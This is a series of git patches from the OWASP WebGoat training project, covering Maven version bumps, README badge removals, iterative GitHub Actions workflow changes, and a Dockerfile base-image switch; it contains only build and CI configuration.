--- a/webgoat-lessons/password-reset/pom.xml
+++ b/webgoat-lessons/password-reset/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
     <dependencies>
diff --git a/webgoat-lessons/path-traversal/pom.xml b/webgoat-lessons/path-traversal/pom.xml
index d84453dca..14319ecd5 100644
--- a/webgoat-lessons/path-traversal/pom.xml
+++ b/webgoat-lessons/path-traversal/pom.xml
@@ -6,6 +6,6 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 </project>
\ No newline at end of file
diff --git a/webgoat-lessons/pom.xml b/webgoat-lessons/pom.xml
index 52cf5b8f0..cdcad2a46 100644
--- a/webgoat-lessons/pom.xml
+++ b/webgoat-lessons/pom.xml
@@ -5,12 +5,12 @@
     <groupId>org.owasp.webgoat.lesson</groupId>
     <artifactId>webgoat-lessons-parent</artifactId>
     <packaging>pom</packaging>
-    <version>8.2.1-SNAPSHOT</version>
+    <version>8.2.3-SNAPSHOT</version>
 
     <parent>
         <groupId>org.owasp.webgoat</groupId>
         <artifactId>webgoat-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
     <modules>
diff --git a/webgoat-lessons/secure-passwords/pom.xml b/webgoat-lessons/secure-passwords/pom.xml
index 000066d75..c280e0255 100644
--- a/webgoat-lessons/secure-passwords/pom.xml
+++ b/webgoat-lessons/secure-passwords/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
     <dependencies>
diff --git a/webgoat-lessons/spoof-cookie/pom.xml b/webgoat-lessons/spoof-cookie/pom.xml
index a1542e2ed..a456b8597 100644
--- a/webgoat-lessons/spoof-cookie/pom.xml
+++ b/webgoat-lessons/spoof-cookie/pom.xml
@@ -7,7 +7,7 @@
 	<parent>
 		<groupId>org.owasp.webgoat.lesson</groupId>
 		<artifactId>webgoat-lessons-parent</artifactId>
-		<version>8.2.1-SNAPSHOT</version>
+		<version>8.2.3-SNAPSHOT</version>
 	</parent>
 
 	<properties>
diff --git a/webgoat-lessons/sql-injection/pom.xml b/webgoat-lessons/sql-injection/pom.xml
index 0ac51bb8b..5683ccc66 100644
--- a/webgoat-lessons/sql-injection/pom.xml
+++ b/webgoat-lessons/sql-injection/pom.xml
@@ -6,6 +6,6 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 </project>
\ No newline at end of file
diff --git a/webgoat-lessons/ssrf/pom.xml b/webgoat-lessons/ssrf/pom.xml
index 25ae98759..094797f69 100755
--- a/webgoat-lessons/ssrf/pom.xml
+++ b/webgoat-lessons/ssrf/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
     <dependencies>
diff --git a/webgoat-lessons/vulnerable-components/pom.xml b/webgoat-lessons/vulnerable-components/pom.xml
index 7bc052d21..dfc9104c6 100644
--- a/webgoat-lessons/vulnerable-components/pom.xml
+++ b/webgoat-lessons/vulnerable-components/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
     <dependencies>
         <dependency>
diff --git a/webgoat-lessons/webgoat-introduction/pom.xml b/webgoat-lessons/webgoat-introduction/pom.xml
index 164776c01..956a8e686 100644
--- a/webgoat-lessons/webgoat-introduction/pom.xml
+++ b/webgoat-lessons/webgoat-introduction/pom.xml
@@ -6,6 +6,6 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 </project>
\ No newline at end of file
diff --git a/webgoat-lessons/webgoat-lesson-template/pom.xml b/webgoat-lessons/webgoat-lesson-template/pom.xml
index 98282bd37..585329154 100644
--- a/webgoat-lessons/webgoat-lesson-template/pom.xml
+++ b/webgoat-lessons/webgoat-lesson-template/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
 </project>
diff --git a/webgoat-lessons/webwolf-introduction/pom.xml b/webgoat-lessons/webwolf-introduction/pom.xml
index 7a4d58616..24e781eff 100644
--- a/webgoat-lessons/webwolf-introduction/pom.xml
+++ b/webgoat-lessons/webwolf-introduction/pom.xml
@@ -6,6 +6,6 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 </project>
\ No newline at end of file
diff --git a/webgoat-lessons/xxe/pom.xml b/webgoat-lessons/xxe/pom.xml
index 856f225c4..6c2528bed 100644
--- a/webgoat-lessons/xxe/pom.xml
+++ b/webgoat-lessons/xxe/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
     <dependencies>
diff --git a/webgoat-server/pom.xml b/webgoat-server/pom.xml
index 76026ec18..1feceb309 100644
--- a/webgoat-server/pom.xml
+++ b/webgoat-server/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat</groupId>
         <artifactId>webgoat-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
     <properties>
diff --git a/webwolf/pom.xml b/webwolf/pom.xml
index 71ca07a4f..5daf7dffd 100644
--- a/webwolf/pom.xml
+++ b/webwolf/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat</groupId>
         <artifactId>webgoat-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
     <dependencies>

From eb163c8df1a99587f153619432a4ea9a34fcfb46 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 3 Oct 2021 11:40:35 +0200
Subject: [PATCH 055/227] Remove unused badges

---
 README.MD | 2 --
 1 file changed, 2 deletions(-)

diff --git a/README.MD b/README.MD
index 8086bb37d..eb4765853 100644
--- a/README.MD
+++ b/README.MD
@@ -1,8 +1,6 @@
 # WebGoat 8: A deliberately insecure Web Application
 
 [![Pull request build](https://github.com/WebGoat/WebGoat/actions/workflows/pr_build.yml/badge.svg?branch=develop)](https://github.com/WebGoat/WebGoat/actions/workflows/pr_build.yml)
-[![Coverage Status](https://coveralls.io/repos/WebGoat/WebGoat/badge.svg?branch=develop&service=github)](https://coveralls.io/github/WebGoat/WebGoat?branch=master)
-[![Codacy Badge](https://api.codacy.com/project/badge/b69ee3a86e3b4afcaf993f210fccfb1d)](https://www.codacy.com/app/dm/WebGoat)
 [![java-jdk](https://img.shields.io/badge/java%20jdk-16-green.svg)](https://jdk.java.net/)
 [![OWASP Labs](https://img.shields.io/badge/owasp-lab%20project-f7b73c.svg)](https://www.owasp.org/index.php/OWASP_Project_Inventory#tab=Labs_Projects)
 [![GitHub release](https://img.shields.io/github/release/WebGoat/WebGoat.svg)](https://github.com/WebGoat/WebGoat/releases/latest)

From 01d3453c4127b10b2d8fe21f4de5d04ee143046d Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sat, 23 Oct 2021 21:12:28 +0200
Subject: [PATCH 056/227] Simplify Github actions Consolidate build steps to 1
 script this way we don't run multiple builds for pushing a branch and create
 a PR.

---
 .github/workflows/branch_build.yml            | 52 -------------------
 .github/workflows/{pr_build.yml => build.yml} | 14 ++---
 .github/workflows/release.yml                 |  2 +-
 3 files changed, 9 insertions(+), 59 deletions(-)
 delete mode 100644 .github/workflows/branch_build.yml
 rename .github/workflows/{pr_build.yml => build.yml} (79%)

diff --git a/.github/workflows/branch_build.yml b/.github/workflows/branch_build.yml
deleted file mode 100644
index eac995619..000000000
--- a/.github/workflows/branch_build.yml
+++ /dev/null
@@ -1,52 +0,0 @@
-name: "Branch build"
-on:
-  push:
-    branches-ignore:
-      - master
-      - develop
-      - release/*
-jobs:
-  install-notest:
-    runs-on: ubuntu-latest
-    name: "Package and linting"
-    steps:
-      - uses: actions/checkout@v2
-      - name: set up JDK 16
-        uses: actions/setup-java@v2
-        with:
-          distribution: 'zulu'
-          java-version: 16
-          architecture: x64
-      - name: Cache Maven packages
-        uses: actions/cache@v2.1.5
-        with:
-          path: ~/.m2
-          key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
-          restore-keys: ubuntu-latest-m2
-      - name: Test with Maven
-        run: mvn install -DskipTests
-
-  testing:
-    needs: install-notest
-    runs-on: ubuntu-latest
-    strategy:
-      matrix:
-        args:
-          - mvn -pl '!webgoat-integration-tests' test
-          - mvn -pl webgoat-integration-tests test
-    steps:
-      - uses: actions/checkout@v2
-      - name: set up JDK 16
-        uses: actions/setup-java@v2
-        with:
-          distribution: 'zulu'
-          java-version: 16
-          architecture: x64
-      - name: Cache Maven packages
-        uses: actions/cache@v2.1.5
-        with:
-          path: ~/.m2
-          key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
-          restore-keys: ubuntu-latest-m2
-      - name: Test with Maven
-        run: ${{ matrix.args }}
diff --git a/.github/workflows/pr_build.yml b/.github/workflows/build.yml
similarity index 79%
rename from .github/workflows/pr_build.yml
rename to .github/workflows/build.yml
index e1b51e9e1..39a7ded3f 100644
--- a/.github/workflows/pr_build.yml
+++ b/.github/workflows/build.yml
@@ -1,4 +1,4 @@
-name: "Pull request build"
+name: "Build"
 on:
   pull_request:
     paths-ignore:
@@ -8,10 +8,6 @@ on:
       - 'LICENSE'
       - 'docs/**'
   push:
-    branches:
-      - master
-      - develop
-      - release/*
     tags-ignore:
       - '*'
     paths-ignore:
@@ -23,6 +19,12 @@ on:
 
 jobs:
   build:
+    if: |
+      ${{
+      github.event_name == 'pull_request' ||
+      (github.event_name == 'push' &&
+      github.event.pull_request.head.repo.full_name != github.repository)
+      }}
     runs-on: ${{ matrix.os }}
     strategy:
       matrix:
@@ -43,4 +45,4 @@ jobs:
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
           restore-keys: ${{ runner.os }}-m2
       - name: Build with Maven
-        run: mvn clean install
+        run: mvn package
diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index e48bc8500..57d612527 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -39,7 +39,7 @@ jobs:
       - name: Build with Maven
         run: |
           mvn versions:set -DnewVersion=${{ env.WEBGOAT_MAVEN_VERSION }}
-          mvn clean install -DskipTests
+          mvn install -DskipTests
 
       - name: "Create release"
         uses: softprops/action-gh-release@v1

From c3f9772a278982c31fd0bfe745efdae39136c09b Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 09:39:37 +0200
Subject: [PATCH 057/227] Simplify Github actions

---
 .github/workflows/build.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 39a7ded3f..94b23e680 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -23,7 +23,7 @@ jobs:
       ${{
       github.event_name == 'pull_request' ||
       (github.event_name == 'push' &&
-      github.event.pull_request.head.repo.full_name != github.repository)
+      github.event.pull_request.head.repo.full_name != 'WebGoat/WebGoat')
       }}
     runs-on: ${{ matrix.os }}
     strategy:

From 98bcef9a5eb1909a94e4d3a8e270d4a0632899a4 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 09:44:57 +0200
Subject: [PATCH 058/227] Simplify Github actions

---
 .github/workflows/build.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 94b23e680..af63b4677 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -22,8 +22,8 @@ jobs:
     if: |
       ${{
       github.event_name == 'pull_request' ||
-      (github.event_name == 'push' &&
-      github.event.pull_request.head.repo.full_name != 'WebGoat/WebGoat')
+      (github.event_name == 'push' && github.event.pull_request.head.repo.full_name != 'WebGoat/WebGoat') ||
+      (github.event.name == 'push' && github.event.repository != 'WebGoat/WebGoat')
       }}
     runs-on: ${{ matrix.os }}
     strategy:

From 7742444a999cec05810d78c5c0e0864446a010f8 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 09:58:28 +0200
Subject: [PATCH 059/227] Simplify Github actions

---
 .github/workflows/build.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index af63b4677..387a78c98 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -23,7 +23,7 @@ jobs:
       ${{
       github.event_name == 'pull_request' ||
       (github.event_name == 'push' && github.event.pull_request.head.repo.full_name != 'WebGoat/WebGoat') ||
-      (github.event.name == 'push' && github.event.repository != 'WebGoat/WebGoat')
+      (github.event.name == 'push' && github.event.repository == 'WebGoat/WebGoat')
       }}
     runs-on: ${{ matrix.os }}
     strategy:

From 2f007babec5dec940e8c9dfb33deb442d062cf9d Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 09:59:35 +0200
Subject: [PATCH 060/227] Simplify Github actions

---
 .github/workflows/build.yml | 1 -
 1 file changed, 1 deletion(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 387a78c98..3e798ddb6 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -22,7 +22,6 @@ jobs:
     if: |
       ${{
       github.event_name == 'pull_request' ||
-      (github.event_name == 'push' && github.event.pull_request.head.repo.full_name != 'WebGoat/WebGoat') ||
       (github.event.name == 'push' && github.event.repository == 'WebGoat/WebGoat')
       }}
     runs-on: ${{ matrix.os }}

From 86d3868d9e56e3db2f4852dc2077ecac54508df3 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 10:00:30 +0200
Subject: [PATCH 061/227] Simplify Github actions

---
 .github/workflows/build.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 3e798ddb6..ac78d41a8 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -21,8 +21,8 @@ jobs:
   build:
     if: |
       ${{
-      github.event_name == 'pull_request' ||
-      (github.event.name == 'push' && github.event.repository == 'WebGoat/WebGoat')
+      (github.event.name == 'push' && github.event.repository == 'WebGoat/WebGoat') ||
+      github.event_name == 'pull_request'
       }}
     runs-on: ${{ matrix.os }}
     strategy:

From 8241d98a38d5e278439c0dd1f48e477e10c10da6 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 10:01:53 +0200
Subject: [PATCH 062/227] Simplify Github actions

---
 .github/workflows/build.yml | 6 +-----
 1 file changed, 1 insertion(+), 5 deletions(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index ac78d41a8..53733d89b 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -19,11 +19,7 @@ on:
 
 jobs:
   build:
-    if: |
-      ${{
-      (github.event.name == 'push' && github.event.repository == 'WebGoat/WebGoat') ||
-      github.event_name == 'pull_request'
-      }}
+    if: (github.event.name == 'push' && github.event.repository == 'WebGoat/WebGoat')
     runs-on: ${{ matrix.os }}
     strategy:
       matrix:

From 672d752e0e7cba680558661cada02a530f7c8b6b Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 10:02:36 +0200
Subject: [PATCH 063/227] Simplify Github actions

---
 .github/workflows/build.yml | 1 -
 1 file changed, 1 deletion(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 53733d89b..38e6707d3 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -19,7 +19,6 @@ on:
 
 jobs:
   build:
-    if: (github.event.name == 'push' && github.event.repository == 'WebGoat/WebGoat')
     runs-on: ${{ matrix.os }}
     strategy:
       matrix:

From cb6c8af3bb014411f10509f6fdce3e8471d1172c Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 10:03:47 +0200
Subject: [PATCH 064/227] Simplify Github actions

---
 docker/start.sh | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/docker/start.sh b/docker/start.sh
index c167d419b..c1fdf8c6b 100644
--- a/docker/start.sh
+++ b/docker/start.sh
@@ -3,7 +3,7 @@
 cd /home/webgoat 
 service nginx start
 sleep 1
-echo "Starting WebGoat..."
+echo "Starting WebGoat...."
 
 java \
  -Duser.home=/home/webgoat \

From cb8739ac068dab6f693e489d96b8cc3b0c54f8b1 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 10:16:52 +0200
Subject: [PATCH 065/227] Simplify Github actions

---
 .github/workflows/build.yml | 7 -------
 1 file changed, 7 deletions(-)

diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 38e6707d3..d247e9c04 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -1,12 +1,5 @@
 name: "Build"
 on:
-  pull_request:
-    paths-ignore:
-      - '.txt'
-      - '*.MD'
-      - '*.md'
-      - 'LICENSE'
-      - 'docs/**'
   push:
     tags-ignore:
       - '*'

From b0174a6b263e58b6559bb50653de9e3214d12f8f Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 10:20:27 +0200
Subject: [PATCH 066/227] Revert all GH actions work

---
 .github/workflows/branch_build.yml            | 52 +++++++++++++++++++
 .github/workflows/{build.yml => pr_build.yml} |  6 ++-
 2 files changed, 57 insertions(+), 1 deletion(-)
 create mode 100644 .github/workflows/branch_build.yml
 rename .github/workflows/{build.yml => pr_build.yml} (89%)

diff --git a/.github/workflows/branch_build.yml b/.github/workflows/branch_build.yml
new file mode 100644
index 000000000..eac995619
--- /dev/null
+++ b/.github/workflows/branch_build.yml
@@ -0,0 +1,52 @@
+name: "Branch build"
+on:
+  push:
+    branches-ignore:
+      - master
+      - develop
+      - release/*
+jobs:
+  install-notest:
+    runs-on: ubuntu-latest
+    name: "Package and linting"
+    steps:
+      - uses: actions/checkout@v2
+      - name: set up JDK 16
+        uses: actions/setup-java@v2
+        with:
+          distribution: 'zulu'
+          java-version: 16
+          architecture: x64
+      - name: Cache Maven packages
+        uses: actions/cache@v2.1.5
+        with:
+          path: ~/.m2
+          key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
+          restore-keys: ubuntu-latest-m2
+      - name: Test with Maven
+        run: mvn install -DskipTests
+
+  testing:
+    needs: install-notest
+    runs-on: ubuntu-latest
+    strategy:
+      matrix:
+        args:
+          - mvn -pl '!webgoat-integration-tests' test
+          - mvn -pl webgoat-integration-tests test
+    steps:
+      - uses: actions/checkout@v2
+      - name: set up JDK 16
+        uses: actions/setup-java@v2
+        with:
+          distribution: 'zulu'
+          java-version: 16
+          architecture: x64
+      - name: Cache Maven packages
+        uses: actions/cache@v2.1.5
+        with:
+          path: ~/.m2
+          key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
+          restore-keys: ubuntu-latest-m2
+      - name: Test with Maven
+        run: ${{ matrix.args }}
diff --git a/.github/workflows/build.yml b/.github/workflows/pr_build.yml
similarity index 89%
rename from .github/workflows/build.yml
rename to .github/workflows/pr_build.yml
index d247e9c04..beb51be31 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/pr_build.yml
@@ -1,6 +1,10 @@
-name: "Build"
+name: "Pull request build"
 on:
   push:
+    branches:
+      - master
+      - develop
+      - release/*
     tags-ignore:
       - '*'
     paths-ignore:

From e5ab24a1fcc941dd629a9b76010d8f641a4855f7 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 10:22:30 +0200
Subject: [PATCH 067/227] Revert all GH actions work

---
 .github/workflows/pr_build.yml | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/.github/workflows/pr_build.yml b/.github/workflows/pr_build.yml
index beb51be31..358cf76b7 100644
--- a/.github/workflows/pr_build.yml
+++ b/.github/workflows/pr_build.yml
@@ -1,5 +1,12 @@
 name: "Pull request build"
 on:
+  pull_request:
+    paths-ignore:
+      - '.txt'
+      - '*.MD'
+      - '*.md'
+      - 'LICENSE'
+      - 'docs/**'
   push:
     branches:
       - master

From be2a6aa0bd65fe974eb0f61baf3329e2e786d57d Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 11:25:15 +0200
Subject: [PATCH 068/227] Run only on branches

---
 .github/workflows/pr_build.yml | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/.github/workflows/pr_build.yml b/.github/workflows/pr_build.yml
index 358cf76b7..fb1d6c037 100644
--- a/.github/workflows/pr_build.yml
+++ b/.github/workflows/pr_build.yml
@@ -23,6 +23,8 @@ on:
 
 jobs:
   build:
+    # Run on PR from different remote not on PR from within WebGoat (committers)
+    if: github.event_name == 'push' || github.event.pull_request.head.repo.full_name != github.repository
     runs-on: ${{ matrix.os }}
     strategy:
       matrix:

From 541c424eb9f63baa585e4ee93b58aa5c0e8bce48 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 11:36:35 +0200
Subject: [PATCH 069/227] Ignore branch builds on our repository

---
 .github/workflows/branch_build.yml | 1 +
 .github/workflows/pr_build.yml     | 2 --
 2 files changed, 1 insertion(+), 2 deletions(-)

diff --git a/.github/workflows/branch_build.yml b/.github/workflows/branch_build.yml
index eac995619..1b7328a6d 100644
--- a/.github/workflows/branch_build.yml
+++ b/.github/workflows/branch_build.yml
@@ -6,6 +6,7 @@ on:
       - develop
       - release/*
 jobs:
+  if: ${{ github.push.repository != github.repository }}
   install-notest:
     runs-on: ubuntu-latest
     name: "Package and linting"
diff --git a/.github/workflows/pr_build.yml b/.github/workflows/pr_build.yml
index fb1d6c037..358cf76b7 100644
--- a/.github/workflows/pr_build.yml
+++ b/.github/workflows/pr_build.yml
@@ -23,8 +23,6 @@ on:
 
 jobs:
   build:
-    # Run on PR from different remote not on PR from within WebGoat (committers)
-    if: github.event_name == 'push' || github.event.pull_request.head.repo.full_name != github.repository
     runs-on: ${{ matrix.os }}
     strategy:
       matrix:

From 720414eba6373999cc0d6302181ba1e7925bcc25 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 11:40:13 +0200
Subject: [PATCH 070/227] Ignore branch builds on our repository

---
 .github/workflows/branch_build.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/branch_build.yml b/.github/workflows/branch_build.yml
index 1b7328a6d..66be8f72b 100644
--- a/.github/workflows/branch_build.yml
+++ b/.github/workflows/branch_build.yml
@@ -6,7 +6,7 @@ on:
       - develop
       - release/*
 jobs:
-  if: ${{ github.push.repository != github.repository }}
+  if: github.push.repository != github.repository
   install-notest:
     runs-on: ubuntu-latest
     name: "Package and linting"

From a4104fdf8bce0c6497f1ea7625451cb07989e678 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 11:43:03 +0200
Subject: [PATCH 071/227] Ignore branch builds on our repository

---
 .github/workflows/branch_build.yml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/.github/workflows/branch_build.yml b/.github/workflows/branch_build.yml
index 66be8f72b..d34fa952c 100644
--- a/.github/workflows/branch_build.yml
+++ b/.github/workflows/branch_build.yml
@@ -6,8 +6,8 @@ on:
       - develop
       - release/*
 jobs:
-  if: github.push.repository != github.repository
   install-notest:
+    if: ${{ github.push.repository != github.repository }}
     runs-on: ubuntu-latest
     name: "Package and linting"
     steps:
@@ -28,6 +28,7 @@ jobs:
         run: mvn install -DskipTests
 
   testing:
+    if: ${{ github.push.repository != github.repository }}
     needs: install-notest
     runs-on: ubuntu-latest
     strategy:

From cc0d0fa2a6f9f4843d766ddd26fb4e9e22484e44 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 24 Oct 2021 11:51:47 +0200
Subject: [PATCH 072/227] Ignore branch builds on main repository

---
 .github/workflows/branch_build.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/.github/workflows/branch_build.yml b/.github/workflows/branch_build.yml
index d34fa952c..efd8a34de 100644
--- a/.github/workflows/branch_build.yml
+++ b/.github/workflows/branch_build.yml
@@ -7,7 +7,7 @@ on:
       - release/*
 jobs:
   install-notest:
-    if: ${{ github.push.repository != github.repository }}
+    if: "github.repository != 'WebGoat/WebGoat'"
     runs-on: ubuntu-latest
     name: "Package and linting"
     steps:
@@ -28,7 +28,7 @@ jobs:
         run: mvn install -DskipTests
 
   testing:
-    if: ${{ github.push.repository != github.repository }}
+    if: "github.repository != 'WebGoat/WebGoat'"
     needs: install-notest
     runs-on: ubuntu-latest
     strategy:

From 981fcb3ebc9f664621f5e71d8a06684f505007ce Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sat, 23 Oct 2021 20:57:16 +0200
Subject: [PATCH 073/227] Move to different base image for Java This way we can
 also support arm/v7

---
 .github/workflows/release.yml                 |  2 +-
 docker/Dockerfile                             | 11 +++-----
 docker/start.sh                               |  6 ++--
 .../java/org/owasp/webgoat/StartWebGoat.java  | 28 +++++++++----------
 .../main/java/org/owasp/webwolf/WebWolf.java  | 25 +++++++++--------
 5 files changed, 35 insertions(+), 37 deletions(-)
 mode change 100644 => 100755 docker/start.sh

diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
index 57d612527..e725c8fa3 100644
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -94,7 +94,7 @@ jobs:
           context: ./docker
           file: docker/Dockerfile
           push: true 
-          platforms: linux/amd64, linux/arm64
+          platforms: linux/amd64, linux/arm64, linux/arm/v7
           tags: |
             webgoat/goatandwolf:${{ env.WEBGOAT_TAG_VERSION }}
             webgoat/goatandwolf:latest
diff --git a/docker/Dockerfile b/docker/Dockerfile
index 1437def53..fda1ab0aa 100644
--- a/docker/Dockerfile
+++ b/docker/Dockerfile
@@ -1,7 +1,4 @@
-FROM openjdk:16-slim
-
-ARG webgoat_version=8.2.1-SNAPSHOT
-ENV webgoat_version_env=${webgoat_version}
+FROM eclipse-temurin:16.0.2_7-jdk-focal
 
 RUN apt-get update
 RUN useradd -ms /bin/bash webgoat
@@ -11,12 +8,12 @@ USER webgoat
 
 COPY --chown=webgoat nginx.conf /etc/nginx/nginx.conf
 COPY --chown=webgoat index.html /usr/share/nginx/html/
-COPY --chown=webgoat target/webgoat-server-${webgoat_version}.jar /home/webgoat/webgoat.jar
-COPY --chown=webgoat target/webwolf-${webgoat_version}.jar /home/webgoat/webwolf.jar
+COPY --chown=webgoat target/webgoat-server-*.jar /home/webgoat/webgoat.jar
+COPY --chown=webgoat target/webwolf-*.jar /home/webgoat/webwolf.jar
 COPY --chown=webgoat start.sh /home/webgoat
 
 EXPOSE 8080
 EXPOSE 9090
 
 WORKDIR /home/webgoat
-ENTRYPOINT /bin/bash /home/webgoat/start.sh $webgoat_version_env
+ENTRYPOINT /bin/bash start.sh
diff --git a/docker/start.sh b/docker/start.sh
old mode 100644
new mode 100755
index c1fdf8c6b..3a37439a6
--- a/docker/start.sh
+++ b/docker/start.sh
@@ -16,11 +16,11 @@ java \
  --add-opens java.desktop/java.awt.font=ALL-UNNAMED \
  --add-opens java.base/sun.nio.ch=ALL-UNNAMED \
  --add-opens java.base/java.io=ALL-UNNAMED \
- -jar webgoat.jar --webgoat.build.version="$1" --server.address=0.0.0.0 > webgoat.log &
+ -jar webgoat.jar --server.address=0.0.0.0 > webgoat.log &
 
 echo "Starting WebWolf..."
